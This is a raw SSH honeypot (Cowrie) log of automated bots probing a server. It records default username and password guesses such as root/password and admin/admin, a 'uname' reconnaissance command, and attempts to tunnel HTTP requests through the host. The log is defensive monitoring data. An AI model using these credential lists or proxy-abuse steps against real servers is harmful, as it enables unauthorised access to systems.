{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.697777Z","src_ip":"41.226.27.251","session":"e0c815dffca3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.699723Z","src_ip":"41.226.27.251","session":"e0c815dffca3"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.768588Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":24550,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:24550","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.814480Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.859798Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.898412Z","src_ip":"41.226.27.251","session":"e0c815dffca3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":903,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:903","sensor":"my-vps","timestamp":"2025-08-31T02:59:18.991020Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.036058Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"193.105.134.95","src_port":19789,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:19789","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.167095Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.211899Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.225586Z","src_ip":"212.227.235.229","session":"fac6e44b7ee2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.233812Z","src_ip":"212.227.235.229","session":"fac6e44b7ee2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"193.105.134.95","src_port":12777,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:12777","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.343306Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.388653Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"193.105.134.95","src_port":15286,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:15286","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.518979Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.563997Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"193.105.134.95","src_port":22822,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22822","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.695164Z","session":"574543682e45"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.740143Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:19.785527Z","src_ip":"193.105.134.95","session":"574543682e45"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:20.178029Z","src_ip":"41.226.27.251","session":"e0c815dffca3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51794,"dst_ip":"1.2.3.4","dst_port":22,"session":"aff03313aa73","protocol":"ssh","message":"New connection: 212.227.235.229:51794 (1.2.3.4:22) [session: aff03313aa73]","sensor":"my-vps","timestamp":"2025-08-31T02:59:24.650859Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:25.302599Z","src_ip":"212.227.235.229","session":"fac6e44b7ee2"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:27.095707Z","src_ip":"212.227.235.229","session":"fac6e44b7ee2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56264,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a92629f82ee","protocol":"ssh","message":"New connection: 212.227.235.229:56264 (1.2.3.4:22) [session: 3a92629f82ee]","sensor":"my-vps","timestamp":"2025-08-31T02:59:30.159050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:30.159997Z","src_ip":"212.227.235.229","session":"3a92629f82ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:30.408179Z","src_ip":"212.227.235.229","session":"3a92629f82ee"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat123","message":"login attempt [tomcat/tomcat123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:31.154469Z","src_ip":"212.227.235.229","session":"3a92629f82ee"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:32.404932Z","src_ip":"212.227.235.229","session":"3a92629f82ee"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":47704,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e00283a8fc6","protocol":"ssh","message":"New connection: 41.226.27.251:47704 (1.2.3.4:22) [session: 4e00283a8fc6]","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.163706Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.165074Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.208387Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.340611Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:59:39.441685Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.442354Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.503420Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:39.504441Z","src_ip":"41.226.27.251","session":"4e00283a8fc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46182,"dst_ip":"1.2.3.4","dst_port":22,"session":"2991e68f4b25","protocol":"ssh","message":"New connection: 212.227.125.160:46182 (1.2.3.4:22) [session: 2991e68f4b25]","sensor":"my-vps","timestamp":"2025-08-31T02:59:40.203243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:40.767534Z","src_ip":"212.227.125.160","session":"2991e68f4b25"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:59:40.768324Z","src_ip":"212.227.125.160","session":"2991e68f4b25"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:43.094388Z","src_ip":"212.227.125.160","session":"2991e68f4b25"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:43.784039Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:43.786098Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:44.888452Z","src_ip":"212.227.125.160","session":"2991e68f4b25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43320,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fc032b7ce55","protocol":"ssh","message":"New connection: 212.227.235.229:43320 (1.2.3.4:22) [session: 9fc032b7ce55]","sensor":"my-vps","timestamp":"2025-08-31T02:59:46.826622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:46.827727Z","src_ip":"212.227.235.229","session":"9fc032b7ce55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:47.076632Z","src_ip":"212.227.235.229","session":"9fc032b7ce55"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-31T02:59:48.073718Z","src_ip":"212.227.235.229","session":"9fc032b7ce55"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:59:49.325553Z","src_ip":"212.227.235.229","session":"9fc032b7ce55"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44274,"dst_ip":"1.2.3.4","dst_port":22,"session":"d39deb969bbe","protocol":"ssh","message":"New connection: 41.226.27.251:44274 (1.2.3.4:22) [session: d39deb969bbe]","sensor":"my-vps","timestamp":"2025-08-31T02:59:59.895130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:59:59.895991Z","src_ip":"41.226.27.251","session":"d39deb969bbe"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:59:59.944318Z","src_ip":"41.226.27.251","session":"d39deb969bbe"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:00.089957Z","src_ip":"41.226.27.251","session":"d39deb969bbe"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:01.297429Z","src_ip":"41.226.27.251","session":"d39deb969bbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36820,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b6145bf434","protocol":"ssh","message":"New connection: 212.227.235.229:36820 (1.2.3.4:22) [session: 34b6145bf434]","sensor":"my-vps","timestamp":"2025-08-31T03:00:19.095717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.194888Z","src_ip":"212.227.235.229","session":"34b6145bf434"}
